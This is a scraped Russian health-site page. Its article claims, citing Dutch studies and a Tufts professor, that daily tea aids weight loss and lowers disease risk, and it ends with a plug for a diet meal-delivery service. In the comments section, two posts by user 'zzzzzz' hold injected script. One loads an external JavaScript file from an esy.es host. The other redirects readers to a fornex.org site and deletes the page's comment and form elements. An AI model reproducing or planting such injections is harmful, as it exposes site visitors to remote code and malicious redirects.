Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что пить в праздники, что...  >>  Что пить в праздники, чтобы быть худой в 2015 году?
 
Обратная связь
 

Что пить в праздники, чтобы быть худой в 2015 году?

Размер шрифта
23 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Отличная новость для желающих сбросить вес без лишних усилий и неприятных процедур. Ученые из Голландии выявили, что чашка чая в день не только способствует похудению, но и снижает риск развития некоторых заболеваний.

Внимание! Внимание! Внимание! Ученые выбрали лучший напиток для похудения!

После анализа нескольких исследований, в которых изучался эффект, оказываемый зеленым и  белым чаем и улуном на массу тела, голландские ученые обнаружили, что натуральные ингредиенты чая – катехины и кофеин – способствуют увеличению энергозатрат человека – количества калорий, которые сжигаются в их присутствии. Также эти вещества усиливают окисление жиров (их распад) в организме.

«Не говоря уже о том, что чай очень полезен для вашего кишечника», – заявляет Джеффри Блумберг, профессор Фридманской Школы диетологии и директор Центра исследований питания и старения в Университете Тафтса. «Научные исследования снова и снова доказывают, что определенные продукты питания могут стимулировать рост полезной или вредной кишечной флоры, и употребление чая является как бы завершающим штрихом в этом процессе».

Если у вас еще остаются сомнения, обдумайте следующее: показано, что употребление одной-двух чашек чая в день улучшает настроение и уменьшает риск возникновения некоторых заболеваний, включая рак, остеопороз, артериальную гипертензию и диабет. И совсем не имеет значения, какой сорт чая вы предпочтете. «Разнообразие только поможет делу», – замечает доктор Блумберг. «Это будет словно маленькое приключение – найти тот чай, который понравится именно вам».

Однако важно отметить, что все эти положительные эффекты незначительны, если не сочетаются со здоровым питанием и физическими упражнениями, говорит доктор Блумберг, особенно в отношении потери веса. Относитесь к чаепитию скорее как к способу улучшить и дополнить ваш рацион питания и здоровье в целом, добавляет он.

Таким образом, сделав одной из своих привычек регулярное потребление любимого сорта чая, можно эффективно совмещать приятное с полезным.

Мы щедро делимся другими секретами идеальной фигуры на страницах специального проекта «Сбрось лишнее».

К слову говоря, «Диета Елены Малышевой» основывается как раз на этом принципе! Попробуйте сами. Уже готовая правильная еда будет доставлена к вам в любое удобное место и время. Вам останется только есть и худеть.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

29 июля 2014 в 13:25

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:35

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему мужчины худеют быстрее женщин   Сколько калорий нужно не съесть, чтобы остаться молодой?   Можно ли сбросить вес после родов?   10 правил похудения, которые действительно работают  
17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть? 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 
05 октября 2011Зеленый чай поможет похудеть 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть ленивой?
Чего не делать, если вы набрали вес?
Как контролировать свои соблазны и похудеть?

Тесты

Правильно ли вы худеете?
Знаете ли вы, как работает ваш желудок?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.